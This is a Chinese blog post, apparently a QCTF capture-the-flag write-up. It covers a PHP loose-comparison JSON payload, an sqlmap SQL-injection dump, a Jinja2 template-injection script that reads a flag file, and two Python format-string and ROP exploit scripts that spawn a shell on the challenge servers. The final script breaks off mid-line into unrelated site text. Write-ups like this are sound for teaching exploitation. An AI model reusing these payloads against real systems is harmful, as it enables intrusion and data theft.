点击上方蓝色字体,关注我们
一、啰嗦两句人话
没参加XMAN,但是水了一波QCTF,题目还可以,就是感觉这样题目对我们这些萌新来说是不是太不友好了,感觉收获还是蛮多的,现在来记录一下CTF的writeup,萌新,不会写wp,大牛绕过。
——霍金 《时间简史》
二、Misc
####X-man-A face
- 题目描述:一脸懵逼- 解题思路: 题目打开是个画图工具修补一下图片 把左边两个角用右上方的角补上,然后就可以用手机扫描二维码了,
三、Web
####Lottery
- 题目描述:http://47.96.118.255:8888
- 解题思路:
题目打开之后可以注册,退出之后无法再次登录
功能大概就是 填7个数字,比较相同的个数,从而或者金币,足够多的金币来购买flag
首先扫描一下存在 .git 泄漏
利用工具把源代码下载之后,代码审计 api存在漏洞的代码:
```
if($numbers[$i] == $win_numbers[$i]){
$same_count++;}
```
$win_numbers[$i] 不可预测
$numbers[$i] 来自用户输入的json数据 没有做任何处理
可以使之为bool类型数据:
payload:{"1":true,"2":true,"3":true,"4":true,"5":true,"6":true,"0":true}
提交两次 钱数增长 购买flag
####NewsCenter
- 题目描述:This is to0 s1mple
http://47.96.118.255:33066
- 解题思路:
本题可以直接sql注入,没有过滤:
抓包 保存在1.txt
```
POST / HTTP/1.1
Host: 47.96.118.255:33066
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Referer: http://47.96.118.255:33066/
Cookie: PHPSESSID=5a3c9494e02ed3c9d0b9008622609f94
Connection: keep-alive
Upgrade-Insecure-Requests: 1
search=asasas
```
然后`sqlmap -r 1.txt -D news -T secret_table --dump`
得到:
+----+-----------------------------+
| id | fl4g |
+----+-----------------------------+
| 1 | QCTF{sq1_inJec7ion_ezzzzzz} |
+----+-----------------------------+
####Confusion1
- 题目描述:confusion1的描述 One day, Bob said "PHP is the best language!", but Alice didn't agree it, so Alice write a website to proof it. She published it before finish it but I find something WRONG at some page.(Please DO NOT use scanner!)
http://47.96.118.255:2333/
- 解题思路:
可以打开index.php,但是不能打开 登录界面和注册界面题目
```
404 Not Found
Not Found
The requested URL /login.php was not found on this
server.
Apache/2.4.10 (Debian) Server at
47.96.118.255 Port 2333
```
404界面提示了flag的位置,这题是要读取文件位置的
不能扫描,会被ban
想起来ASIS的一个类似的题目,猜是ssti 服务端模版注入
访问如下链接:`
http://47.96.118.255:2333/{{ 7*7 }}`
返回
```
The requested URL /49 was not found on this server.
```
访问 `http://47.96.118.255:2333/{{ 7*'7' }}`
返回
```
The requested URL /7777777 was not found on this server.
```
验证了模版是:Jinja2
关于服务端模版注入,这里讲的比较好:https://portswigger.net/blog/server-side-template-injection
但是过滤了class 和 read 导致基础类都没法使用,需要绕过
没有过滤request
因此可以从其他地方获得class
脚本如下
```
import requests
url = '''http://47.96.118.255:2333/{{''[request.cookies.p1][request.cookies.p2][2][request.cookies.p3]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.cookies.p4]()}}'''
cookies = {}
cookies['p1'] = '__class__'
cookies['p2'] = '__mro__'
cookies['p3'] = '__subclasses__'
cookies['p4'] = 'read'
print requests.get(url,cookies=cookies).text
```
四、PWN
####notebook
- 题目描述:nc 118.31.49.175 9999
- 解题思路:一个栈溢出,在check2时候有格式化字符串漏洞。通过格式化字符串修改stack_check_fail的got为pop地址,构造rop
```
```
from zio import *
import struct
#target=('127.0.0.1', 10000)
target=('118.31.49.175' ,9999)
io = zio(target, timeout=10000,
print_read=COLORED(RAW, 'red'),
print_write=COLORED(RAW, 'green'))
c2=raw_input('go?')
io.read_until('May I have your name?')
payload='%'+str(0x880B)+'d'+'%25$hn'+'\x00'*3+l32(0x0804A028)
payload+='1'*0x70
payload+=l32(0x08048791) #get input
payload+=l32(0x08048CAA) #pop 2
payload+=l32(0x0804A100)
payload+=l32(0x8)
payload+=l32(0x080485C0) #system
payload+=l32(0x0)
payload+=l32(0x0804a100)
io.writeline(payload)
raw_input('go?')
io.write('/bin/sh\x00')
io.interact()
#QCTF{f0rmat_s7r1ng_is_happy_}
```
####babycpp
- 题目描述:nc 118.31.49.175 2333
- 解题思路:babycpp 数组越界,难点在于泄露canary,通过unquire函数将canary值复制都较靠前的栈地址使之可以泄露,而后构造rop拿到shell
from zio import *
import struct
#target=('127.0.0.1', 10000)
target=('118.31.49.175', 2333)
io = zio(target, timeout=10000,
print_read=COLORED(RAW, 'red'),
print_write=COLORED(RAW, 'green'))
c2=raw_input('go?')
io.read_until('input n:')
io.writeline('20')
io.read_until('4.exit.')
io.writeline('2')
payload='1\n'
payload+='1\n'
payload+='2\n'
payload+='3\n'
payload+='4\n'
payload+='5\n'
payload+='6\n'
payload+='7\n'
payload+='8\n'
payload+='9\n'
payload+='10\n'
payload+='11\n'
payload+='12\n'
payload+='13\n'
payload+='14\n'
payload+='15\n'
payload+='16\n'
payload+='17\n'
payload+='18\n'
payload+='19\n'
io.read_until('input 20 num:')
io.writeline(payload)
io.read_until('4.exit.')
io.writeline('1')
io.writeline('2')
io.read_until('4.exit.')
io.writeline('2')
io.read_until('input 2 num:')
io.writeline('1\n1')
io.read_until('4.exit.')
io.writeline('1')
io.writeline('24')
io.read_until('4.exit.')
io.writeline('3')
io.read_until('4.exit.')
io.writeline('1')
io.writeline('2')
io.read_until('4.exit.')
io.writeline('2')
io.read_until('input 2 num:')
io.writeline('1\n1')
io.read_until('4.exit.')
io.writeline('1')
io.writeline('23')
io.read_until('4.exit.')
io.writeline('3')
io.read_until('4.exit.')
io.writeline('1')
io.writeline('2')
io.read_until('4.exit.')
io.writeline('2')
io.read_until('input 2 num:')
io.writeline('1\n1')
io.read_until('4.exit.')
io.writeline('1')
io.writeline('22')
io.read_until('4.exit.')
io.writeline('3')
io.read_until('4.exit.')
io.writeline('1')
io.writeline('2')
io.read_until('4.exit.')
io.writeline('2')
io.read_until('input 2 num:')
io.writeline('1\n1')
io.read_until('4.exit.')
io.writeline('1')
io.writeline('21')
io.read_until('4.exit.')
raw_input('go?')
io.writeline('3')
io.read_until('19 ')
io.read_until(' ')
io.read_until(' ')
test=io.read_until(' ')
test=test[0:-1]
low=int(test,10)
test=io.read_until(' ')
test=test[0:-1]
high=int(test,10)
gs=high*0x100000000+low
print hex(gs)
io.read_until('4.exit.')
io.writeline('1')
io.writeline('56')
io.read_until('4.exit.')
raw_input('go?')
io.writeline('2')
payload='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+='1\n'+'1\n'
payload+=str(low)+'\n'+str(high)+'\n'
payload+='1\n'+'1\n'
payload+=str(0x00401251)+'\n'+str(0x0)+'\n'
payload+=str(0x00602090)+'\n'+str(0x0)+'\n'
payload+='1\n'+'1\n'
payload+=str(0x00401253)+'\n'+str(0x0)+'\n'
payload+=str(0x00602200)+'\n'+str(0x0)+'\n'
payload+=str(0x00400Ab0)+'\n'+str(0x0)+'\n'
payload+=str(0x00401251)+'\n'+str(0x0)+'\n'
payload+=str(0x00602050)+'\n'+str(0x0)+'\n'
payload+='1\n'+'1\n'
payload+=str(0x00401253)+'\n'+str(0x0)+'\n'
payload+=str(0x006020c0)+'\n'+str(0x0)+'\n'
payload+=str(0x00400af0)+'\n'+str(0x0)+'\n'
payload+=str(0x00401253)+'\n'+str(0x0)+'\n'
payload+=str(0x00602050)+'\n'+str(0x0)+'\n'
payload+=str(0x00400Ad0)+'\n'+str(0x0)+'\n'
io.read_until('input 56 num:')
io.writeline(payload)
io.read_until('4.exit.')
io.writeline('4')
io.read_until('\n')
io.read(2)
test=io.read(6)+'\x00'*2
system=struct.unpack("
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?
微信扫码登录